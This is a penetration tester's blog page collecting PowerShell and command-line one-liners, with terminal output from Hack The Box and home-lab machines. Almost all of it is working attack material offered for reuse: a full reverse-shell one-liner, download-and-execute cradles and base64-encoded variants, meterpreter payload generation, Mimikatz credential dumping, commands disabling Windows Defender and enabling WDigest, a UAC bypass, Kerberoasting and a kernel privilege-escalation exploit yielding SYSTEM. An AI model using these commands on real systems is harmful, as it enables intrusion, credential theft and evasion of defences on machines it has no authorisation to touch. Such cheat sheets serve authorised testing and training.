puckiestyle – pentesting

puckiestyle – ethical hacking

 

For info or a quote, mail us at info@puckiestyle.nl or use the contact form 

whoami : Network / System Engineer , Security specialist from Meppel (NL)

powershell oneliners

PowerShell (any version):

(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.19/shell-443.exe", "C:\FTP\Intranet\shell-443.exe")
PS C:\users\hillie>

(New-Object System.Net.WebClient).DownloadFile(“http://192.168.178.16:8000/MS14-058.exe”, “c:\users\public\MS14-058.exe”)

C:\> PowerShell (New-Object System.Net.WebClient).DownloadFile('http://192.168.178.16:8000/launcher.bat’,’launcher.bat'); Start-Process ‘launcher.bat'
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.178.16',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
PS C:\Users\hillie>

IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.178.16/puckieshell443.ps1’)

C:\Users\hillie>

cmdkey /list

Currently stored credentials:
Target: Domain:interactive=HTB\Administrator
Type: Domain Password
User: HTB\Administrator
c:\Python37>

python -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.98 - - [28/Feb/2019 19:38:58] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
c:\Users\Public>

certutil -urlcache -split -f http://10.10.14.20/puckieshell443.ps1

PS C:\pentest>

certutil.exe -f -split -VerifyCTL http://192.168.178.12/msbuild_nps.xml

CertUtil: -verifyCTL command FAILED: 0x8009310b (ASN: 267 CRYPT_E_ASN1_BADTAG)
CertUtil: ASN1 bad tag value met.

PS C:\pentest>

dir *.bin

Directory: C:\pentest

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/7/2019   4:16 PM           5462 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin

PS C:\pentest>

mv 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin msbuild_nps.xml

PS C:\pentest>

dir *.xml

Directory: C:\pentest

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/7/2019 4:16 PM 5462 msbuild_nps.xml
C:\Users\Public>

runas /user:HTB\administrator /savecred “powershell IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.14.20/puckieshell443.ps1’)”

C:\Users\jacco>

nc -lvp 443

listening on [any] 443 ...
10.10.10.xx: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.98] 49167: NO_DATA
Windows PowerShell running as user Administrator on HTB
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>

whoami

HTB\administrator
root@kali:~/htb/access#

echo -n “IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.14.20/puckieshell53.ps1’)” | iconv –to-code UTF-16LE | base64 -w 0


SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA=

c:\Users\Public>

runas /user:ACCESS\administrator /savecred “powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA=”powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString(‘http://192.168.178.13/powercat.ps1’);powercat -c 192.168.178.13 -p 1234 -e cmdFull documentation here.

PowerShell 4.0 & 5.0:

PS C:\Users\hillie> Invoke-WebRequest "http://192.168.178.50/shell-443.exe" -OutFile "C:\FTP\intranet\shell-443.exe"
PS C:\Users\hillie>  

xp_cmdshell “PowerShell IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.20/puckieshell443.ps1’)xp_cmdshell “PowerShell IEX(IWR(‘http://10.10.14.20/puckieshell443.ps1’))”

Full documentation here.

c:\inetpub\wwwroot\internal-01\log>

powershell

powershell
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

Cannot load PSReadline module. Console is running without PSReadline.
PS C:\inetpub\wwwroot\internal-01\log>

$username = ‘BART\h.potter’

PS C:\inetpub\wwwroot\internal-01\log>

$securePassword = ConvertTo-SecureString -AsPlainText -Force ‘Password1’

PS C:\inetpub\wwwroot\internal-01\log>

$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword

PS C:\inetpub\wwwroot\internal-01\log>

Enter-PSSession -ComputerName localhost -Credential $credential


[localhost]: PS C:\Users\h.potter\Documents> whoami

bart\h.potter
[localhost]: PS C:\Users\h.potter\Documents>

[System.Environment]::Is64BitOperatingSystem


True

[localhost]: PS C:\Users\h.potter\Documents>

[System.Environment]::Is64BitProcess


True


PS C:\users>

IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.178.16:8000/Sherlock.ps1’)

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
             ample-Exploits/MS16-135
VulnStatus : Appears Vulnerable
PS C:\Users\hillie>

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://www.puckiestyle.nl/ps/powerup.ps1‘);Invoke-AllChecks”

PS C:\Users\hillie>

(new-object net.webclient).downloadfile(‘http://10.10.14.20/powerup.ps1’, ‘C:\users\mssql-svc\appdata\local\temp\powerup.ps1’)

PS C:\users\mssql-svc\appdata\local\temp>

import-module ./powerup.ps1

   [*] Running Invoke-AllChecks

PS C:\Users\hillie> powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/invoke-mimikatz.ps1');Invoke-Mimikatz"
PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/powerview.ps1');Get-IPAddress"                    PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/windowsenum.ps1')"                                       PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/jaws.ps1')"

Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.50/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.78.50 -Lport 4444

PS C:\users\hillie> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/MS14-058.exe", "c:\users\public\MS14-058.exe")

d:\PENTEST\impacket-examples-windows-master>psexec puckiestyle.local/administrator@192.168.178.200
PS D:\PENTEST\impacket-examples-windows-master> Connect-PSSession -ComputerName 192.168.178.200 -Credential administrator

C:\WINDOWS\system32>psexec.exe \\192.168.178.200 -u puckiestyle\puck -p p@ssw0rd cmd.exe

wmic /NODE:”DC01″ /USER:”puckiestyle\administrator” OS GET Name

wmic /node:192.168.23.214 NIC get description,macaddress

wmic /USER:”puckiestyle\puck” /PASSWORD:”p@ssw0rd” /NODE:192.168.178.200 process call create “powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.178.50/Invoke-Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt”

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

rundll32.exe user32.dll,LockWorkStation

root@kali#

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=443 -f exe -o mrshell-p443.exe

root@kali#

msfconsole -x “use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.14.20; set lport 443; set ExitOnSession false; exploit -j”

PS C:\WINDOWS\system32>

Set-MpPreference -DisableRealtimeMonitoring $true

PS C:\WINDOWS\system32>

Set-MpPreference -DisableIOAVProtection $true

change claire password to Password!

Powershell Set-ADAccountPassword -Reset -NewPassword (ConvertTo-SecureString -String ‘Password1!’ -AsPlainText -Force) -Identity Claire

Login as Claire and Grant Tom access to Backup_Admins

Powershell Add-ADGroupmember -Identity Backup_Admins -Members tom

Want to add a brand new executable extension (also callable from a .bat)?

C:\Users\jacco>set PATHEXT=%PATHEXT%;.puck
C:\Users\jacco>set pathext
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.puck

Want to know Applocker status from a cmd shell?

powershell -nop -c "import-module applocker; get-command *applocker*"
powershell -nop -c "import-module applocker; Get-AppLockerPolicy -Effective -Xml"

Set TrustedHosts with PowerShell (as Admin)

Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value "Computer1,Computer2"

And check (don’t need Admin for that)

Get-Item WSMan:\localhost\Client\TrustedHosts
c:\users\public\

powershell IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.14.20/puckieshell53.ps1’)

root@kali:~/htb/optimum#

python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.8 - - [09/Apr/2019 10:06:51] "GET /puckieshell53.ps1 HTTP/1.1" 200 -
root@kali:~/htb/optimum#

nc -lvp 53

Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::53
Ncat: Listening on 0.0.0.0:53
Ncat: Connection from 10.10.10.8.
Ncat: Connection from 10.10.10.8:49541.
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop>

[System.Environment]::Is64BitOperatingSystem

True
PS C:\Users\kostas\Desktop>

[System.Environment]::Is64BitProcess

True
.
PS C:\users>

(New-Object System.Net.WebClient).DownloadFile(“http://192.168.178.16:8000/Invoke-MS16135.ps1”, “c:\users\public\Invoke-MS16135.ps1”)

PS C:\users\public>

import-module ./Invoke-MS16135.ps1

 
PS C:\users\public>

Invoke-MS16135 -Command “IEX(New-Object Net.WebClient).DownloadString(‘http://192.168.178.16/puckieshell53.ps1’)”

_____ _____ ___ ___ ___ ___ ___ 
| | __|_ | | _|___|_ | |_ | _|
| | | |__ |_| |_| . |___|_| |_|_ |_ |
|_|_|_|_____|_____|___| |_____|___|___|

[by b33f -> @FuzzySec]


[!] Success, spawning a system shell! 

root@kali:~/htb#

nc -lvp 53

listening on [any] 53 ...
192.168.178.11: inverse host lookup failed: Unknown host
connect to [192.168.178.16] from (UNKNOWN) [192.168.178.11] 49238
Windows PowerShell running as user hillie on HILLIE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\users\public>

whoami


nt authority\system

PS C:\users\public>
If you ever need to enable RDP (mstsc) on a Windows 10 machine, and you can’t get to the System control panel item, use Powershell to enable RDP:

If you ever need to enable RDP (mstsc) on a Windows 10 machine, and you can’t get to the System control panel item, use Powershell to enable RDP:

Execute aboves cmdlets as Administrator in Powershell, and RDP should work.

To test the connection, open Powershell on another machine, and run:

PS C:\Users\jacco>

Test-NetConnection 10.10.10.97 -CommonTCPPort rdp

ComputerName : 10.10.10.97
RemoteAddress : 10.10.10.97
RemotePort : 3389
InterfaceAlias : Ethernet 2
SourceAddress : 10.10.14.12
TcpTestSucceeded : True

PS C:\Users\jacco>
PS C:\Users\jacco>

[Convert]::ToBase64String([IO.File]::ReadAllBytes( “C:\PENTEST\secret.txt”))

ZGl0IGJlc3RhbmQgaXMgZ2VoZWltDQpncm9ldGplcyBQdWNr
PS C:\Users\jacco>
PS C:\pentest>

[IO.File]::WriteAllBytes( “c:\pentest\new.txt” ,[Convert]::FromBase64String( “ZGl0IGJlc3RhbmQgaXMgZ2VoZWl


tDQpncm9ldGplcyBQdWNr”))

PS C:\pentest> type new.txt
dit bestand is geheim
groetjes Puck
# Description: 
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]

powershell.exe -exec bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1’);Invoke-BypassUAC -Command ‘start powershell.exe'”

# Invoke-Mimikatz: Dump credentials from memory

powershell.exe -exec bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1’);Invoke-Mimikatz -DumpCreds”

# Import Mimikatz Module to run further commands

powershell.exe -exec Bypass -noexit -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1’)”

# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]

powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1’);’$env:COMPUTERNAME’|Invoke-MassMimikatz -Verbose”

# PowerUp: Privilege escalation checks

powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks”

# Invoke-Inveigh and log output to file

powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1’);Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y”

# Invoke-Kerberoast and provide Hashcat compatible hashes

powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1’);Invoke-kerberoast -OutputFormat Hashcat”

# Invoke-ShareFinder and print output to file

powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1’);Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt”

# Import PowerView Module to run further commands

powershell.exe -exec Bypass -noexit -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1’)”

# Invoke-Bloodhound

powershell.exe -exec Bypass -C “IEX(New-Object Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1’);Invoke-BloodHound”

# Find GPP Passwords in SYSVOL

findstr /S cpassword $env:logonserver\sysvol\*.xml findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)

# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]

runas /user:DOMAIN\USER /noprofile powershell.exe

# Insert reg key to enable Wdigest on newer versions of Windows

reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1

Download cradle
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/puckiestyle/powershell/refs/heads/master/rev.ps1')

then

cat cradle | iconv -t utf-16le | base64 -w0; echo
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcAB1AGMAawBpAGUAcwB0AHkAbABlAC8AcABvAHcAZQByAHMAaABlAGwAbAAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAcwB0AGUAcgAvAHIAZQB2AC4AcABzADEAJwApAAoACgA=

then

http://10.10.11.17/data/modules/shell.php?cmd=powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcAB1AGMAawBpAGUAcwB0AHkAbABlAC8AcABvAHcAZQByAHMAaABlAGwAbAAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAcwB0AGUAcgAvAHIAZQB2AC4AcABzADEAJwApAAoACgA=

 

(c)2024